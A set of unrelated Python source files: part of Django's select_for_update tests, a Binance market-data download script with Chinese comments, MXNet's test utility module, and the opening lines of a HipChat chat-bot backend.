with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.select_related(
'born__country',
).select_for_update(
of=('born__country',),
).select_for_update(
of=('self', 'born__country')
))
features = connections['default'].features
if features.select_for_update_of_column:
expected = [
'select_for_update_person"."id',
'select_for_update_country"."entity_ptr_id',
]
else:
expected = ['select_for_update_person', 'select_for_update_country']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_model_inheritance_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCountry.objects.select_for_update(of=('self',)))
if connection.features.select_for_update_of_column:
expected = ['select_for_update_eucountry"."country_ptr_id']
else:
expected = ['select_for_update_eucountry']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_model_inheritance_ptr_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCountry.objects.select_for_update(of=('self', 'country_ptr',)))
if connection.features.select_for_update_of_column:
expected = [
'select_for_update_eucountry"."country_ptr_id',
'select_for_update_country"."entity_ptr_id',
]
else:
expected = ['select_for_update_eucountry', 'select_for_update_country']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_related_model_inheritance_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCity.objects.select_related('country').select_for_update(
of=('self', 'country'),
))
if connection.features.select_for_update_of_column:
expected = [
'select_for_update_eucity"."id',
'select_for_update_eucountry"."country_ptr_id',
]
else:
expected = ['select_for_update_eucity', 'select_for_update_eucountry']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_model_inheritance_nested_ptr_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCity.objects.select_related('country').select_for_update(
of=('self', 'country__country_ptr',),
))
if connection.features.select_for_update_of_column:
expected = [
'select_for_update_eucity"."id',
'select_for_update_country"."entity_ptr_id',
]
else:
expected = ['select_for_update_eucity', 'select_for_update_country']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_multilevel_model_inheritance_ptr_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCountry.objects.select_for_update(
of=('country_ptr', 'country_ptr__entity_ptr'),
))
if connection.features.select_for_update_of_column:
expected = [
'select_for_update_country"."entity_ptr_id',
'select_for_update_entity"."id',
]
else:
expected = ['select_for_update_country', 'select_for_update_entity']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_model_proxy_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(CityCountryProxy.objects.select_related(
'country',
).select_for_update(
of=('country',),
))
if connection.features.select_for_update_of_column:
expected = ['select_for_update_country"."entity_ptr_id']
else:
expected = ['select_for_update_country']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_of_followed_by_values(self):
with transaction.atomic():
values = list(Person.objects.select_for_update(of=('self',)).values('pk'))
self.assertEqual(values, [{'pk': self.person.pk}])
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_of_followed_by_values_list(self):
with transaction.atomic():
values = list(Person.objects.select_for_update(of=('self',)).values_list('pk'))
self.assertEqual(values, [(self.person.pk,)])
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_of_self_when_self_is_not_selected(self):
"""
select_for_update(of=['self']) when the only columns selected are from
related tables.
"""
with transaction.atomic():
values = list(Person.objects.select_related('born').select_for_update(of=('self',)).values('born__name'))
self.assertEqual(values, [{'born__name': self.city1.name}])
@skipUnlessDBFeature('has_select_for_update_nowait')
def test_nowait_raises_error_on_block(self):
"""
If nowait is specified, we expect an error to be raised rather
than blocking.
"""
self.start_blocking_transaction()
status = []
thread = threading.Thread(
target=self.run_select_for_update,
args=(status,),
kwargs={'nowait': True},
)
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], DatabaseError)
@skipUnlessDBFeature('has_select_for_update_skip_locked')
def test_skip_locked_skips_locked_rows(self):
"""
If skip_locked is specified, the locked row is skipped resulting in
Person.DoesNotExist.
"""
self.start_blocking_transaction()
status = []
thread = threading.Thread(
target=self.run_select_for_update,
args=(status,),
kwargs={'skip_locked': True},
)
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], Person.DoesNotExist)
@skipIfDBFeature('has_select_for_update_nowait')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_nowait_raises_error(self):
"""
NotSupportedError is raised if a SELECT...FOR UPDATE NOWAIT is run on
a database backend that supports FOR UPDATE but not NOWAIT.
"""
with self.assertRaisesMessage(NotSupportedError, 'NOWAIT is not supported on this database backend.'):
with transaction.atomic():
Person.objects.select_for_update(nowait=True).get()
@skipIfDBFeature('has_select_for_update_skip_locked')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_skip_locked_raises_error(self):
"""
NotSupportedError is raised if a SELECT...FOR UPDATE SKIP LOCKED is run
on a database backend that supports FOR UPDATE but not SKIP LOCKED.
"""
with self.assertRaisesMessage(NotSupportedError, 'SKIP LOCKED is not supported on this database backend.'):
with transaction.atomic():
Person.objects.select_for_update(skip_locked=True).get()
@skipIfDBFeature('has_select_for_update_of')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_of_raises_error(self):
"""
NotSupportedError is raised if a SELECT...FOR UPDATE OF... is run on
a database backend that supports FOR UPDATE but not OF.
"""
msg = 'FOR UPDATE OF is not supported on this database backend.'
with self.assertRaisesMessage(NotSupportedError, msg):
with transaction.atomic():
Person.objects.select_for_update(of=('self',)).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_unrelated_of_argument_raises_error(self):
"""
FieldError is raised if a non-relation field is specified in of=(...).
"""
msg = (
'Invalid field name(s) given in select_for_update(of=(...)): %s. '
'Only relational fields followed in the query are allowed. '
'Choices are: self, born, born__country, '
'born__country__entity_ptr.'
)
invalid_of = [
('nonexistent',),
('name',),
('born__nonexistent',),
('born__name',),
('born__nonexistent', 'born__name'),
]
for of in invalid_of:
with self.subTest(of=of):
with self.assertRaisesMessage(FieldError, msg % ', '.join(of)):
with transaction.atomic():
Person.objects.select_related('born__country').select_for_update(of=of).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_related_but_unselected_of_argument_raises_error(self):
"""
FieldError is raised if a relation field that is not followed in the
query is specified in of=(...).
"""
msg = (
'Invalid field name(s) given in select_for_update(of=(...)): %s. '
'Only relational fields followed in the query are allowed. '
'Choices are: self, born, profile.'
)
for name in ['born__country', 'died', 'died__country']:
with self.subTest(name=name):
with self.assertRaisesMessage(FieldError, msg % name):
with transaction.atomic():
Person.objects.select_related(
'born', 'profile',
).exclude(profile=None).select_for_update(of=(name,)).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_model_inheritance_of_argument_raises_error_ptr_in_choices(self):
msg = (
'Invalid field name(s) given in select_for_update(of=(...)): '
'name. Only relational fields followed in the query are allowed. '
'Choices are: self, %s.'
)
with self.assertRaisesMessage(
FieldError,
msg % 'country, country__country_ptr, country__country_ptr__entity_ptr',
):
with transaction.atomic():
EUCity.objects.select_related(
'country',
).select_for_update(of=('name',)).get()
with self.assertRaisesMessage(FieldError, msg % 'country_ptr, country_ptr__entity_ptr'):
with transaction.atomic():
EUCountry.objects.select_for_update(of=('name',)).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_model_proxy_of_argument_raises_error_proxy_field_in_choices(self):
msg = (
'Invalid field name(s) given in select_for_update(of=(...)): '
'name. Only relational fields followed in the query are allowed. '
'Choices are: self, country, country__entity_ptr.'
)
with self.assertRaisesMessage(FieldError, msg):
with transaction.atomic():
CityCountryProxy.objects.select_related(
'country',
).select_for_update(of=('name',)).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_reverse_one_to_one_of_arguments(self):
"""
Reverse OneToOneFields may be included in of=(...) as long as NULLs
are excluded because LEFT JOIN isn't allowed in SELECT FOR UPDATE.
"""
with transaction.atomic():
person = Person.objects.select_related(
'profile',
).exclude(profile=None).select_for_update(of=('profile',)).get()
self.assertEqual(person.profile, self.person_profile)
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_after_from(self):
features_class = connections['default'].features.__class__
attribute_to_patch = "%s.%s.for_update_after_from" % (features_class.__module__, features_class.__name__)
with mock.patch(attribute_to_patch, return_value=True):
with transaction.atomic():
self.assertIn('FOR UPDATE WHERE', str(Person.objects.filter(name='foo').select_for_update().query))
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_requires_transaction(self):
"""
A TransactionManagementError is raised
when a select_for_update query is executed outside of a transaction.
"""
msg = 'select_for_update cannot be used outside of a transaction.'
with self.assertRaisesMessage(transaction.TransactionManagementError, msg):
list(Person.objects.all().select_for_update())
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_requires_transaction_only_in_execution(self):
"""
No TransactionManagementError is raised
when select_for_update is invoked outside of a transaction -
only when the query is executed.
"""
people = Person.objects.all().select_for_update()
msg = 'select_for_update cannot be used outside of a transaction.'
with self.assertRaisesMessage(transaction.TransactionManagementError, msg):
list(people)
@skipUnlessDBFeature('supports_select_for_update_with_limit')
def test_select_for_update_with_limit(self):
other = Person.objects.create(name='Grappeli', born=self.city1, died=self.city2)
with transaction.atomic():
qs = list(Person.objects.all().order_by('pk').select_for_update()[1:2])
self.assertEqual(qs[0], other)
@skipIfDBFeature('supports_select_for_update_with_limit')
def test_unsupported_select_for_update_with_limit(self):
msg = 'LIMIT/OFFSET is not supported with select_for_update on this database backend.'
with self.assertRaisesMessage(NotSupportedError, msg):
with transaction.atomic():
list(Person.objects.all().order_by('pk').select_for_update()[1:2])
def run_select_for_update(self, status, **kwargs):
"""
Utility method that runs a SELECT FOR UPDATE against all
Person instances. After the select_for_update, it attempts
to update the name of the only record, save, and commit.
This function expects to run in a separate thread.
"""
status.append('started')
try:
# We need to enter transaction management again, as this is done on
# per-thread basis
with transaction.atomic():
person = Person.objects.select_for_update(**kwargs).get()
person.name = 'Fred'
person.save()
except (DatabaseError, Person.DoesNotExist) as e:
status.append(e)
finally:
# This method is run in a separate thread. It uses its own
# database connection. Close it without waiting for the GC.
connection.close()
@skipUnlessDBFeature('has_select_for_update')
@skipUnlessDBFeature('supports_transactions')
def test_block(self):
"""
A thread running a select_for_update that accesses rows being touched
by a similar operation on another connection blocks correctly.
"""
# First, let's start the transaction in our thread.
self.start_blocking_transaction()
# Now, try it again using the ORM's select_for_update
# facility. Do this in a separate thread.
status = []
thread = threading.Thread(
target=self.run_select_for_update, args=(status,)
)
# The thread should immediately block, but we'll sleep
# for a bit to make sure.
thread.start()
sanity_count = 0
while len(status) != 1 and sanity_count < 10:
sanity_count += 1
time.sleep(1)
if sanity_count >= 10:
raise ValueError('Thread did not run and block')
# Check the person hasn't been updated. Since this isn't
# using FOR UPDATE, it won't block.
p = Person.objects.get(pk=self.person.pk)
self.assertEqual('Reinhardt', p.name)
# When we end our blocking transaction, our thread should
# be able to continue.
self.end_blocking_transaction()
thread.join(5.0)
# Check the thread has finished. Assuming it has, we should
# find that it has updated the person's name.
self.assertFalse(thread.is_alive())
# We must commit the transaction to ensure that MySQL gets a fresh read,
# since by default it runs in REPEATABLE READ mode
transaction.commit()
p = Person.objects.get(pk=self.person.pk)
self.assertEqual('Fred', p.name)
@skipUnlessDBFeature('has_select_for_update')
def test_raw_lock_not_available(self):
"""
Running a raw query which can't obtain a FOR UPDATE lock raises
the correct exception
"""
self.start_blocking_transaction()
def raw(status):
try:
list(
Person.objects.raw(
'SELECT * FROM %s %s' % (
Person._meta.db_table,
connection.ops.for_update_sql(nowait=True)
)
)
)
except DatabaseError as e:
status.append(e)
finally:
# This method is run in a separate thread. It uses its own
# database connection. Close it without waiting for the GC.
# Connection cannot be closed on Oracle because cursor is still
# open.
if connection.vendor != 'oracle':
connection.close()
status = []
thread = threading.Thread(target=raw, kwargs={'status': status})
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], DatabaseError)
@skipUnlessDBFeature('has_select_for_update')
@override_settings(DATABASE_ROUTERS=[TestRouter()])
def test_select_for_update_on_multidb(self):
query = Person.objects.select_for_update()
self.assertEqual(router.db_for_write(Person), query.db)
@skipUnlessDBFeature('has_select_for_update')
def test_select_for_update_with_get(self):
with transaction.atomic():
person = Person.objects.select_for_update().get(name='Reinhardt')
self.assertEqual(person.name, 'Reinhardt')
def test_nowait_and_skip_locked(self):
with self.assertRaisesMessage(ValueError, 'The nowait option cannot be used with skip_locked.'):
Person.objects.select_for_update(nowait=True, skip_locked=True)
def test_ordered_select_for_update(self):
"""
Subqueries should respect ordering as an ORDER BY clause may be useful
to specify a row locking order to prevent deadlocks (#27193).
"""
with transaction.atomic():
qs = Person.objects.filter(id__in=Person.objects.order_by('-id').select_for_update())
self.assertIn('ORDER BY', str(qs.query))
|
download_data_demo2.py
|
"""
我们使用币安原生的api进行数据爬取.
"""
import pandas as pd
import time
from datetime import datetime
import requests
import pytz
from jiamtrader.trader.database import database_manager
pd.set_option('expand_frame_repr', False)
from jiamtrader.trader.object import BarData, Interval, Exchange
BINANCE_SPOT_LIMIT = 1000
BINANCE_FUTURE_LIMIT = 1500
CHINA_TZ = pytz.timezone("Asia/Shanghai")
from threading import Thread
def generate_datetime(timestamp: float) -> datetime:
"""
:param timestamp:
:return:
"""
dt = datetime.fromtimestamp(timestamp / 1000)
dt = CHINA_TZ.localize(dt)
return dt
def get_binance_data(symbol: str, exchanges: str, start_time: str, end_time: str):
"""
爬取币安交易所的数据
:param symbol: BTCUSDT.
:param exchanges: 现货、USDT合约, 或者币币合约.
:param start_time: 格式如下:2020-1-1 或者2020-01-01
:param end_time: 格式如下:2020-1-1 或者2020-01-01
:return:
"""
api_url = ''
save_symbol = symbol
gate_way = 'BINANCES'
if exchanges == 'spot':
print("spot")
limit = BINANCE_SPOT_LIMIT
save_symbol = symbol.lower()
gate_way = 'BINANCE'
api_url = f'https://api.binance.com/api/v3/klines?symbol={symbol}&interval=1m&limit={limit}'
elif exchanges == 'future':
print('future')
limit = BINANCE_FUTURE_LIMIT
api_url = f'https://fapi.binance.com/fapi/v1/klines?symbol={symbol}&interval=1m&limit={limit}'
elif exchanges == 'coin_future':
print("coin_future")
limit = BINANCE_FUTURE_LIMIT
        api_url = f'https://dapi.binance.com/dapi/v1/klines?symbol={symbol}&interval=1m&limit={limit}'
else:
        raise Exception("exchanges must be one of: spot, future, coin_future")
start_time = int(datetime.strptime(start_time, '%Y-%m-%d').timestamp() * 1000)
end_time = int(datetime.strptime(end_time, '%Y-%m-%d').timestamp() * 1000)
while True:
try:
print(start_time)
url = f'{api_url}&startTime={start_time}'
print(url)
data = requests.get(url=url, timeout=10, proxies=proxies).json()
"""
[
[
1591258320000, // 开盘时间
"9640.7", // 开盘价
"9642.4", // 最高价
"9640.6", // 最低价
"9642.0", // 收盘价(当前K线未结束的即为最新价)
"206", // 成交量
1591258379999, // 收盘时间
"2.13660389", // 成交额(标的数量)
48, // 成交笔数
"119", // 主动买入成交量
"1.23424865", // 主动买入成交额(标的数量)
"0" // 请忽略该参数
]
"""
buf = []
for l in data:
bar = BarData(
symbol=save_symbol,
exchange=Exchange.BINANCE,
datetime=generate_datetime(l[0]),
interval=Interval.MINUTE,
volume=float(l[5]),
open_price=float(l[1]),
high_price=float(l[2]),
low_price=float(l[3]),
close_price=float(l[4]),
gateway_name=gate_way
)
buf.append(bar)
database_manager.save_bar_data(buf)
            # stop once we are past end_time, or once the last bar's close time is within one minute of now (data has caught up)
if (data[-1][0] > end_time) or data[-1][6] >= (int(time.time() * 1000) - 60 * 1000):
break
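            # The next request starts from the last bar's open time, so that bar
            # is fetched twice; save_bar_data is assumed to upsert on
            # (symbol, datetime), which makes the overlap harmless.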
start_time = data[-1][0]
except Exception as error:
print(error)
time.sleep(10)
def download_spot(symbol):
"""
下载现货数据的方法.
:return:
"""
t1 = Thread(target=get_binance_data, args=(symbol, 'spot', "2018-1-1", "2019-1-1"))
t2 = Thread(target=get_binance_data, args=(symbol, 'spot', "2019-1-1", "2020-1-1"))
t3 = Thread(target=get_binance_data, args=(symbol, 'spot', "2020-1-1", "2020-11-16"))
t1.start()
t2.start()
t3.start()
t1.join()
t2.join()
t3.join()
def download_future(symbol):
"""
下载合约数据的方法。
:return:
"""
t1 = Thread(target=get_binance_data, args=(symbol, 'future', "2019-9-10", "2020-3-1"))
t2 = Thread(target=get_binance_data, args=(symbol, 'future', "2019-3-1", "2020-11-16"))
t1.start()
t2.start()
t1.join()
t2.join()
if __name__ == '__main__':
    # Set a proxy if you have one; otherwise leave it as None or an empty string "".
    # Either way, make sure this machine can reach Binance, e.g. check that `ping api.binance.com` works.
    proxy_host = "127.0.0.1"  # proxy host, e.g. 127.0.0.1; set to "" if you have no proxy
    proxy_port = 1087  # proxy port, e.g. 1087; set to 0 if you have no proxy (you must still be able to reach api.binance.com)
proxies = None
if proxy_host and proxy_port:
proxy = f'http://{proxy_host}:{proxy_port}'
proxies = {'http': proxy, 'https': proxy}
symbol = "BTCUSDT"
    # download_spot(symbol)  # download spot data
    download_future(symbol)  # download futures data
|
common.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import sys, os, logging, functools
import multiprocessing as mp
import mxnet as mx
import numpy as np
import random
import shutil
from mxnet.base import MXNetError
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.append(os.path.join(curr_path, '../common/'))
sys.path.insert(0, os.path.join(curr_path, '../../../python'))
import models
from contextlib import contextmanager
import pytest
import tempfile
def assertRaises(expected_exception, func, *args, **kwargs):
try:
func(*args, **kwargs)
except expected_exception as e:
pass
else:
# Did not raise exception
assert False, "%s did not raise %s" % (func.__name__, expected_exception.__name__)
def default_logger():
"""A logger used to output seed information to logs."""
logger = logging.getLogger(__name__)
# getLogger() lookups will return the same logger, but only add the handler once.
if not len(logger.handlers):
handler = logging.StreamHandler(sys.stderr)
handler.setFormatter(logging.Formatter('[%(levelname)s] %(message)s'))
logger.addHandler(handler)
if (logger.getEffectiveLevel() == logging.NOTSET):
logger.setLevel(logging.INFO)
return logger
@contextmanager
def random_seed(seed=None):
"""
Runs a code block with a new seed for np, mx and python's random.
Parameters
----------
seed : the seed to pass to np.random, mx.random and python's random.
To impose rng determinism, invoke e.g. as in:
with random_seed(1234):
...
To impose rng non-determinism, invoke as in:
with random_seed():
...
Upon conclusion of the block, the rng's are returned to
a state that is a function of their pre-block state, so
any prior non-determinism is preserved.
"""
try:
next_seed = np.random.randint(0, np.iinfo(np.int32).max)
if seed is None:
np.random.seed()
seed = np.random.randint(0, np.iinfo(np.int32).max)
logger = default_logger()
logger.debug('Setting np, mx and python random seeds = %s', seed)
np.random.seed(seed)
mx.random.seed(seed)
random.seed(seed)
yield
finally:
# Reinstate prior state of np.random and other generators
np.random.seed(next_seed)
mx.random.seed(next_seed)
random.seed(next_seed)
def _assert_raise_cuxx_version_not_satisfied(min_version, cfg):
def less_than(version_left, version_right):
"""Compares two version strings in the format num(.[num])*"""
if not version_left or not version_right:
return False
left = version_left.split(".")
right = version_right.split(".")
# 0 pad shortest version - e.g.
# less_than("9.1", "9.1.9") == less_than("9.1.0", "9.1.9")
longest = max(len(left), len(right))
        left.extend(['0'] * (longest - len(left)))
        right.extend(['0'] * (longest - len(right)))
# compare each of the version components
for l, r in zip(left, right):
if l == r:
continue
return int(l) < int(r)
return False
def test_helper(orig_test):
@functools.wraps(orig_test)
def test_new(*args, **kwargs):
cuxx_off = os.getenv(cfg['TEST_OFF_ENV_VAR']) == 'true'
cuxx_env_version = os.getenv(cfg['VERSION_ENV_VAR'], None if cuxx_off else cfg['DEFAULT_VERSION'])
cuxx_test_disabled = cuxx_off or less_than(cuxx_env_version, min_version)
if not cuxx_test_disabled or mx.context.current_context().device_type == 'cpu':
orig_test(*args, **kwargs)
else:
pytest.raises((MXNetError, RuntimeError), orig_test, *args, **kwargs)
return test_new
return test_helper
def assert_raises_cudnn_not_satisfied(min_version):
return _assert_raise_cuxx_version_not_satisfied(min_version, {
'TEST_OFF_ENV_VAR': 'CUDNN_OFF_TEST_ONLY',
'VERSION_ENV_VAR': 'CUDNN_VERSION',
'DEFAULT_VERSION': '7.3.1'
})
def assert_raises_cuda_not_satisfied(min_version):
return _assert_raise_cuxx_version_not_satisfied(min_version, {
'TEST_OFF_ENV_VAR': 'CUDA_OFF_TEST_ONLY',
'VERSION_ENV_VAR': 'CUDA_VERSION',
'DEFAULT_VERSION': '10.1'
})
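# Usage sketch (hypothetical test): the returned decorator runs the test
# normally when the installed version satisfies min_version (or when running
# on CPU), and otherwise expects it to raise MXNetError/RuntimeError:
#     @assert_raises_cudnn_not_satisfied(min_version='7.2.1')
#     def test_needs_recent_cudnn():
#         ...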
def with_seed(seed=None):
"""
A decorator for test functions that manages rng seeds.
Parameters
----------
seed : the seed to pass to np.random and mx.random
This tests decorator sets the np, mx and python random seeds identically
prior to each test, then outputs those seeds if the test fails or
if the test requires a fixed seed (as a reminder to make the test
more robust against random data).
@with_seed()
def test_ok_with_random_data():
...
@with_seed(1234)
def test_not_ok_with_random_data():
...
Use of the @with_seed() decorator for all tests creates
tests isolation and reproducability of failures. When a
test fails, the decorator outputs the seed used. The user
can then set the environment variable MXNET_TEST_SEED to
the value reported, then rerun the test with:
pytest --verbose --capture=no <test_module_name.py>::<failing_test>
To run a test repeatedly, set MXNET_TEST_COUNT=<NNN> in the environment.
To see the seeds of even the passing tests, add '--log-level=DEBUG' to pytest.
"""
def test_helper(orig_test):
@functools.wraps(orig_test)
def test_new(*args, **kwargs):
test_count = int(os.getenv('MXNET_TEST_COUNT', '1'))
env_seed_str = os.getenv('MXNET_TEST_SEED')
for i in range(test_count):
if seed is not None:
this_test_seed = seed
log_level = logging.INFO
elif env_seed_str is not None:
this_test_seed = int(env_seed_str)
log_level = logging.INFO
else:
this_test_seed = np.random.randint(0, np.iinfo(np.int32).max)
log_level = logging.DEBUG
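                # save the pre-test RNG state; the finally block below restores it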
post_test_state = np.random.get_state()
np.random.seed(this_test_seed)
mx.random.seed(this_test_seed)
random.seed(this_test_seed)
logger = default_logger()
                # 'pytest --log-level=DEBUG' shows this msg even with an ensuing core dump.
test_count_msg = '{} of {}: '.format(i+1,test_count) if test_count > 1 else ''
test_msg = ('{}Setting test np/mx/python random seeds, use MXNET_TEST_SEED={}'
' to reproduce.').format(test_count_msg, this_test_seed)
logger.log(log_level, test_msg)
try:
orig_test(*args, **kwargs)
except:
# With exceptions, repeat test_msg at INFO level to be sure it's seen.
if log_level < logging.INFO:
logger.info(test_msg)
raise
finally:
np.random.set_state(post_test_state)
return test_new
return test_helper
def setup_module():
"""
A function with a 'magic name' executed automatically before each pytest module
(file of tests) that helps reproduce a test segfault by setting and outputting the rng seeds.
The segfault-debug procedure on a module called test_module.py is:
1. run "pytest --verbose test_module.py". A seg-faulting output might be:
[INFO] np, mx and python random seeds = 4018804151
test_module.test1 ... ok
test_module.test2 ... Illegal instruction (core dumped)
2. Copy the module-starting seed into the next command, then run:
    MXNET_MODULE_SEED=4018804151 pytest --log-level=DEBUG --verbose test_module.py
Output might be:
[WARNING] **** module-level seed is set: all tests running deterministically ****
[INFO] np, mx and python random seeds = 4018804151
test_module.test1 ... [DEBUG] np and mx random seeds = 3935862516
ok
test_module.test2 ... [DEBUG] np and mx random seeds = 1435005594
Illegal instruction (core dumped)
3. Copy the segfaulting-test seed into the command:
    MXNET_TEST_SEED=1435005594 pytest --log-level=DEBUG --verbose test_module.py::test2
Output might be:
[INFO] np, mx and python random seeds = 2481884723
test_module.test2 ... [DEBUG] np and mx random seeds = 1435005594
Illegal instruction (core dumped)
    4. Finally reproduce the segfault directly under gdb (might need additional os packages)
by editing the bottom of test_module.py to be
if __name__ == '__main__':
logging.getLogger().setLevel(logging.DEBUG)
test2()
MXNET_TEST_SEED=1435005594 gdb -ex r --args python test_module.py
    5. When finished debugging the segfault, remember to unset any exported MXNET_ seed
variables in the environment to return to non-deterministic testing (a good thing).
"""
module_seed_str = os.getenv('MXNET_MODULE_SEED')
logger = default_logger()
if module_seed_str is None:
seed = np.random.randint(0, np.iinfo(np.int32).max)
else:
seed = int(module_seed_str)
logger.warn('*** module-level seed is set: all tests running deterministically ***')
logger.info('Setting module np/mx/python random seeds, use MXNET_MODULE_SEED=%s to reproduce.', seed)
np.random.seed(seed)
mx.random.seed(seed)
random.seed(seed)
# The MXNET_TEST_SEED environment variable will override MXNET_MODULE_SEED for tests with
# the 'with_seed()' decoration. Inform the user of this once here at the module level.
if os.getenv('MXNET_TEST_SEED') is not None:
logger.warn('*** test-level seed set: all "@with_seed()" tests run deterministically ***')
try:
from tempfile import TemporaryDirectory
except: # Python 2 support
# really simple implementation of TemporaryDirectory
class TemporaryDirectory(object):
def __init__(self, suffix='', prefix='', dir=''):
self._dirname = tempfile.mkdtemp(suffix, prefix, dir)
def __enter__(self):
return self._dirname
def __exit__(self, exc_type, exc_value, traceback):
shutil.rmtree(self._dirname)
def teardown_module():
"""
A function with a 'magic name' executed automatically after each pytest test module.
    It waits for all operations in one file to finish before carrying on to the next.
"""
mx.nd.waitall()
def with_post_test_cleanup():
"""
    Helper function that cleans up memory by releasing it from the memory pool.
Required especially by large tensor tests that have memory footprints in GBs.
"""
def test_helper(orig_test):
@functools.wraps(orig_test)
def test_new(*args, **kwargs):
logger = default_logger()
try:
orig_test(*args, **kwargs)
            except:
                logger.info('Test failed; cleaning up memory before re-raising.')
raise
finally:
mx.nd.waitall()
mx.cpu().empty_cache()
return test_new
return test_helper
def run_in_spawned_process(func, env, *args):
"""
Helper function to run a test in its own process.
Avoids issues with Singleton- or otherwise-cached environment variable lookups in the backend.
Adds a seed as first arg to propagate determinism.
Parameters
----------
func : function to run in a spawned process.
env : dict of additional environment values to set temporarily in the environment before exec.
args : args to pass to the function.
Returns
-------
Whether the python version supports running the function as a spawned process.
This routine calculates a random seed and passes it into the test as a first argument. If the
test uses random values, it should include an outer 'with random_seed(seed):'. If the
test needs to return values to the caller, consider use of shared variable arguments.
"""
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
return False
else:
seed = np.random.randint(0,1024*1024*1024)
orig_environ = os.environ.copy()
try:
for (key, value) in env.items():
os.environ[key] = str(value)
# Prepend seed as first arg
p = mpctx.Process(target=func, args=(seed,)+args)
p.start()
p.join()
assert p.exitcode == 0, "Non-zero exit code %d from %s()." % (p.exitcode, func.__name__)
finally:
os.environ.clear()
os.environ.update(orig_environ)
return True
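# A minimal usage sketch (hypothetical worker): run_in_spawned_process prepends
# a seed to the args, and the env vars apply only inside the spawned process.
#
# def _check_uniform(seed, shape):
#     with random_seed(seed):
#         assert mx.nd.random.uniform(shape=shape).shape == shape
#
# run_in_spawned_process(_check_uniform, {'MXNET_ENGINE_TYPE': 'NaiveEngine'}, (2, 2))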
def retry(n):
"""Retry n times before failing for stochastic test cases."""
# TODO(szha): replace with flaky
# https://github.com/apache/incubator-mxnet/issues/17803
assert n > 0
def test_helper(orig_test):
@functools.wraps(orig_test)
def test_new(*args, **kwargs):
"""Wrapper for tests function."""
for _ in range(n):
try:
orig_test(*args, **kwargs)
except AssertionError as e:
err = e
continue
return
raise err
return test_new
return test_helper
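# A minimal usage sketch (hypothetical test): the test body is re-run up to
# 3 times, and the last AssertionError propagates only if every attempt fails.
#
# @retry(3)
# @with_seed()
# def test_stochastic_bound():
#     assert np.random.uniform() < 0.999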
|
hipchat.py
|
from datetime import datetime
import json
import logging
from multiprocessing.queues import Empty
from multiprocessing import Process, Queue
import random
import re
import requests
import pickle
import sys
import time
import threading
import traceback
from sleekxmpp import ClientXMPP
from sleekxmpp.exceptions import IqError, IqTimeout
from .base import IOBackend
from will import settings
from will.utils import is_admin
from will.acl import is_acl_allowed
from will.abstractions import Event, Message, Person, Channel
from will.utils import Bunch, UNSURE_REPLIES, clean_for_pickling
from will.mixins import StorageMixin, PubSubMixin
ROOM_NOTIFICATION_URL = "https://%(server)s/v2/room/%(room_id)s/notification?auth_token=%(token)s"
ROOM_TOPIC_URL = "https://%(server)s/v2/room/%(room_id)s/topic?auth_token=%(token)s"
ROOM_URL = "https://%(server)s/v2/room/%(room_id)s/?auth_token=%(token)s"
